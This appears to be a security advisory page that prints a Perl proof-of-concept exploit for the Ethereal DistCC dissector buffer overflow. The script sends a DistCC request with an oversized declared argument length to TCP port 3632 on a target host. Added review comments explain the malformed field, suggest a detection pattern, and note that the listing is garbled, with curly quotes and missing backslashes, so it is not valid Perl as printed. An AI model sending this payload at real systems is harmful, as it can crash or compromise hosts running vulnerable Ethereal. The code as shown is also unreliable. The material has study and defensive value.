‘Ethereal DistCC Buffer Overflow (Exploit)’
Summary
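‘As we reported in our previous article, Ethereal DistCC Dissector Overflow, the DistCC dissector in Ethereal is affected by an overflow; a proof-of-concept exploit is listed below.’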
Credit:
‘The information has been provided by beSTORM.’
Details
‘Vulnerable Systems:
* Ethereal version 0.10.10 and prior
Immune Systems:
* Ethereal version 0.10.11 or newer
Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™
use IO::Socket;
use strict;
# Proof-of-concept driver: builds one DistCC-style request and writes it to a
# TCP connection on the distcc port.
#
# NOTE(review): this listing appears extraction-garbled. String delimiters
# show up as typographic quotes and the trailing "n" in the messages looks
# like a "\n" escape that lost its backslash. As printed it is not valid Perl;
# the statements are kept verbatim as a record of the published sample.
#
# NOTE(review): the page attributes the flaw to Ethereal's DistCC dissector,
# so the component at risk would be a host decoding this traffic in Ethereal
# rather than the distcc daemon the script connects to. Confirm against the
# referenced advisory. The page lists Ethereal 0.10.11 or newer as immune.

# The first command-line argument is the destination host.
my $target = shift;
# Guard flag read and set by usage() so the banner is printed only once.
my $print_usage = 0;
if (!$target)
{
# No host given: show the usage banner, then fall back to a hard-coded address.
usage();
print ‘No target has been supplied, reverting to 192.168.1.52.n’;
$target = ‘192.168.1.52’;
}
print ‘Will attack $target.n’;
# NOTE(review): $target_port is declared but never read below; the connect
# call passes the literal 3632 instead.
my $target_port = 3632;
# Request layout as visible in the heredoc: 4-character tokens, each followed
# by an 8-hex-digit field (DIST00000001, ARGC00000008, the ARGV entries, DOTI).
# Every ARGV/DOTI field equals the length of the text after it (00000002
# before "-g", 0000001B before the 27-character C source) except the first
# ARGV, which declares FFFFFF00 while only "cc" follows.
# NOTE(review): that mismatched length is presumably the malformed field the
# dissector mishandles. Confirm against the advisory. For detection, look for
# a token on TCP 3632 whose declared length far exceeds the data remaining.
my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()n{n return(0);n}n
END
print ‘Sending: [$packet]n’;
# Open a TCP connection to the target on port 3632; new() yields a false
# value on failure, which the next line turns into a fatal error.
my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $target, PeerPort => ‘3632’);
unless ($remote) { die ‘cannot connect to distcc daemon on $target’ }
# Write the request to the socket; no reply is read and the socket is not
# explicitly closed.
print $remote $packet;
print ‘Done.n’;
# usage: print the command-line help banner at most once per run.
# Takes no arguments. Reads and sets the file-scoped $print_usage flag.
sub usage
{
# A banner that was already shown is not repeated.
if ($print_usage) { return; }
$print_usage = 1;
# Separator line: the "x" repetition operator yields fifty "#" characters.
print (‘#’x50);
print ‘n’;
# $0 is the script's own name as invoked.
print ‘# $0 [hostname]n’;
print ‘# hostnamet-tThe host the packet will be sent to.n’;
print ‘n’;
# NOTE(review): the quote mark after the closing brace looks like the end of
# the page's quoted Details text rather than Perl.
}’